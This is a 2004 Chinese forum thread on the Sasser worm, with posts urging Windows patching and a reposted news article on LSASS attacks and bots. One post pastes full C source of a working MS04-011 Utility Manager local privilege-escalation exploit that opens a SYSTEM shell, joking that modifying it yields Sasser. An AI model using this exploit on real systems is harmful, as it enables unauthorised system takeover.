警惕！]新蠕虫震荡波(Worm.Sasser）

trauben · 发表于 2004-5-1 22:26

提示: 作者被禁止或删除内容自动屏蔽

adherent · 发表于 2004-5-1 22:42

考，这么快就出这种病毒啦

编病毒的真是吃饱了没事干

路路 · 发表于 2004-5-2 07:23

没什么好说的，bufu运气真实好。微软上个星期才公布的4个高危漏洞之一，就被你碰上了。估计下面还有很多人倒霉，有时间的大家都打补丁（如果安装删除里面有了KB835732可以放心了），还有防火墙，杀毒升级。

那些做病毒的还真有闲情。

路路 · 发表于 2004-5-2 07:25

5月2日消息称，据一家安全公司介绍，一种类似“冲击波”的病毒很快即将出现。一些安全公司已经开始敦促用户，要他们尽快为自己的Windows操作系统打上补丁。

正如媒体此前所报道的那样，近来网上出现了一些程序，它们可以利用Windows本地安全授权子系统服务（LSASS）中广泛存在的一个漏洞发动攻击，这是引起人们担忧的主要原因。而且，这些程序已经被集成到一种被称为bot的远程攻击软件中去了，而这正是一种病毒从一个简单的脚本转化为一种成熟的病毒所需经历的最后一个步骤。

美国时间30日，网络保护公司Lurhq对它的客户发布了一项建议，声称“未来24到48小时内”，一种蠕虫病毒很可能会开始发作。

安全公司赛门铁克也警告用户说，利用LSASS中的漏洞发起攻击的危险正在增加。美国时间29日，赛门铁克通知该公司的用户，它的两台“honeypo”服务器（一种用于吸引恶性程序并探测新的威胁的服务器）在前后几分钟的时间内，已经受到了bot远程攻击软件的攻击。

Bot远程攻击软件已经对数量众多的计算机发动过攻击，它可以暗中将计算机系统的控制权转交到攻击者的手中，从而使得这些计算机成为攻击者bot。

一位分析人士表示：“在我看来，bot网络甚至比蠕虫病毒更危险。我们告诉客户，不要想着去抵御一种预料中的蠕虫病毒的攻击，而应该为他们的系统打上补丁。”通过打补丁，用户的计算机系统可以同时免受bot远程攻击软件和蠕虫病毒的威胁。

路路 · 发表于 2004-5-2 07:43

MS04-011 相关代码，有兴趣的朋友可以看看$灌水$
改改就是震荡波$怕怕$

Microsoft Windows Utility Manager Local SYSTEM Exploit (MS04-011)

提交代码： powwow

提交日期： 2004-04-16

代码属性：本地

代码类别： Windows

浏览次数：今3次/总1052次

// By Cesar Cerrudo cesar appsecinc com
// Local elevation of priviliges exploit for Windows Utility Manager
// Gives you a shell with system privileges
// If you have problems try changing Sleep() values.

#include <stdio.h>
#include <windows.h>
#include <commctrl.h>
#include <Winuser.h>

int main(int argc, char *argv[])
{
HWND lHandle, lHandle2;
POINT point;

char sText[]="%windir%\\system32\\cmd.ex?";

// run utility manager
system("utilman.exe /start");
Sleep(500);

// execute contextual help
SendMessage(FindWindow(NULL, "Utility manager"), 0x4D, 0, 0);
Sleep(500);

// open file open dialog windown in Windows Help
PostMessage(FindWindow(NULL, "Windows Help"), WM_COMMAND, 0x44D, 0);
Sleep(500);

// find open file dialog window
lHandle = FindWindow("#32770","Open");

// get input box handle
lHandle2 = GetDlgItem(lHandle, 0x47C);
Sleep(500);

// set text to filter listview to display only cmd.exe
SendMessage (lHandle2, WM_SETTEXT, 0, (LPARAM)sText);
Sleep(800);

// send return
SendMessage (lHandle2, WM_IME_KEYDOWN, VK_RETURN, 0);

//get navigation bar handle
lHandle2 = GetDlgItem(lHandle, 0x4A0);
//send tab
SendMessage (lHandle2, WM_IME_KEYDOWN, VK_TAB, 0);
Sleep(500);
lHandle2 = FindWindowEx(lHandle,NULL,"SHELLDLL_DefView", NULL);
//get list view handle
lHandle2 = GetDlgItem(lHandle2, 0x1);

SendMessage (lHandle2, WM_IME_KEYDOWN, 0x43, 0); // send "c" char
SendMessage (lHandle2, WM_IME_KEYDOWN, 0x4D, 0); // send "m" char
SendMessage (lHandle2, WM_IME_KEYDOWN, 0x44, 0); // send "d" char
Sleep(500);

// popup context menu
PostMessage (lHandle2, WM_CONTEXTMENU, 0, 0);
Sleep(1000);

// get context menu handle
point.x =10; point.y =30;
lHandle2=WindowFromPoint(point);

SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
SendMessage (lHandle2, WM_KEYDOWN, VK_DOWN, 0); // move down in menu
SendMessage (lHandle2, WM_KEYDOWN, VK_RETURN, 0); // send return

SendMessage (lHandle, WM_CLOSE,0,0); // close open file dialog window

return(0);
}

Sunnygirl · 发表于 2004-5-2 23:19

恨！制造的人真应该千刀万刮！害SUNNY这样的门外汉也得自己行动起来了，好在有大侠的大力协助。谢谢。。。。

账号		自动登录	找回密码
密码			注册

trauben trauben 当前离线积分 200 头像被屏蔽 TA的专栏	发表于 2004-5-1 22:26 \| 显示全部楼层 \|阅读模式全德超低价！Bpost比利时包裹极速体验；代收转寄免费仓储；EMS阳光清关安全可靠。提示: 作者被禁止或删除内容自动屏蔽
trauben trauben 当前离线积分 200 头像被屏蔽 TA的专栏	相关帖子 • Mongolian Death Worm （胆小勿看） Die von den Nutzern eingestellten Information und Meinungen sind nicht eigene Informationen und Meinungen der DOLC GmbH.
	回复我要上头条举报

萍聚头条

警惕！]新蠕虫震荡波(Worm.Sasser）

相关帖子

今天看电视也说新病毒来了